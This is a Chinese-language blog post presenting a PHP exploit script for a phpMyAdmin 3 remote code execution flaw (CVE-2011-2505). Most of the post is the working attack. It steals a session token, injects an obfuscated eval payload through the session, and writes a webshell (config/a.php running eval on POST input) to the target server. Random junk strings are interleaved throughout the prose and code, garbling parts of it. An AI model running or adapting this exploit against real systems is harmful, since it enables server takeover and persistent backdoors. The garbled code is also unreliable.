phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。

昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。

5 b. @! e) _6 @& f. n首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。

! ]/ |9 {, |8 i$ ~3 s% }在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

5 P  V1 }9 E9 P; E. s. i于是写了这个php版本的exp，代码如下：

#!/usr/bin/php
<?php
$ @4 H+ X" S& Y$ Cprint_r('
: ?" ^6 c+ z6 T6 ~* j5 b+---------------------------------------------------------------------------+
/ b  u0 ~4 A' N: H! N% Ipma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
3 {- G) `) n5 o. O5 c$ [# fwelcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
4 A# B9 `! w$ y& I* e3 c8 {');
( ~, C% B/ r8 ?8 X" F! a
/**
* working when the directory:"config" exists and is writeable.
**/
) v: V# V; L7 A+ g& k
' L6 A7 k2 ~+ s/ uif ($argc < 3) {
    print_r('
5 V  K: P. v/ a' `3 q+---------------------------------------------------------------------------+
* q; g: g0 i+ r& ]6 rUsage: php '.$argv[0].' host path
host:      target server (ip/hostname)
4 U, g: A9 _; U6 f- i  Ipath:      path to pma3
: S$ V( Y- B) M5 G: t7 iExample:
php '.$argv[0].' localhost /pma/
  H$ a5 _$ S+ A3 V  F+---------------------------------------------------------------------------+
');
6 W0 Q5 z: r# T0 Q    exit;
}

7 D, @1 z1 J1 c) }) C$host = $argv[1];
+ U$ v, o, z% s0 ?7 b$path = $argv[2];

7 V% D+ o9 N7 a! j- D' |/**
* Try to determine if the directory:"config" exists
$ m0 f' ?3 G8 `**/
echo "[+] Try to determine if the directory:config exists....\n";
" r0 B# g$ f! L, P& L: Z6 c* c$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
5 @7 b3 a' @& t! @; k4 O}
- B0 ^& a! @" A) V# d
$ p8 z* u5 p: I$ S6 N- I+ w$ F/**
8 T' i+ K; H# B( W' v7 B" T * Try to get token and sessionid
% [. ?0 e4 h* q- @( Z. c$ i" k/ m**/
echo "[+] Try to get token and sessionid....\n";
, M2 g& O+ V2 M' a2 d$result=php_request('index.php');
- v! }$ n2 r( m) r8 Qpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
4 Q1 g8 I& D" ?9 [& H$ X! Bif($token && $sessionid){
    echo "[+] tokentoken\n";
/ ^6 q3 S% \- T% ^" Z* `    echo "[+] Session IDsessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
7 R$ @7 Y$ p0 p4 \7 }}
: x( |& |1 ?8 r" z. |4 {* @, j' ?
/**
+ t( Q8 x3 M. F2 k1 h# F. P * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
/ f6 F" D+ U$ M6 V( u) P3 {6 Hphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
# C4 O' c( e  O, n6 M6 Z( z+ W
0 X* ]5 @5 k7 a9 ~6 ]% K5 U  g/**
' T0 l6 x' v1 J0 j" s, E * Try to create webshell
**/
8 i  C, q6 p/ r% becho "[+] Try to create webshell....\n";
' l0 I. R) w; s) r' Cphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
3 L' I# ]- W4 J7 m! `! g, N, \/**
* Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
& r% z. o) V0 _1 z' t  T! oif(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
- }" |1 q# d4 n    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
+ V% n; D3 u' R; u; B
+ r& G* H! m" S! \) Kfunction php_request($url,$data='',$cookie=''){
    global  $host, $path;
: @) G5 }- S  P" \" y1 @" i   
    $method=$data?'POST':'GET';
   
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
7 ^0 j! W" x. b& ^& H4 P8 n% B    $packet .= "Accept: */*\r\n";
; G0 ^* g. o! K    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
; S+ V0 r( P+ N: B0 |* V' P' G$ G    $packet .= "Host: $host\r\n";
4 o% [( L" w0 z1 f    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
' ^' C4 N5 `8 C; v/ ^/ a" M    $packet .= $cookie?"Cookie: $cookie\r\n":"";
* H  a. y( G" B8 H2 \5 g% e7 y3 |5 J    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";
; @# J% z* C( M0 [/ u8 L
" I- q. w! v; I( y: F0 Q$ q" ?$ o* }2 L    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
8 j. l; ?. E# z' l, ^0 |8 Z    echo 'No response from '.$host; die;
    }
8 j, V; {6 ~4 D% j: P, J2 U    fputs($fp, $packet);
1 \5 W1 t( O1 X/ _
5 A; R) s5 [: Y    $resp = '';

* S% `/ f- A9 K2 U! g3 n) G  P    while ($fp && !feof($fp))
# R( Q" h4 ~$ e4 t        $resp .= fread($fp, 1024);

    return $resp;
6 K3 v' F7 D2 I; U2 n3 \9 |' l  a}
0 q/ A8 e7 X; ?7 ^: b: A7 j   
?>
.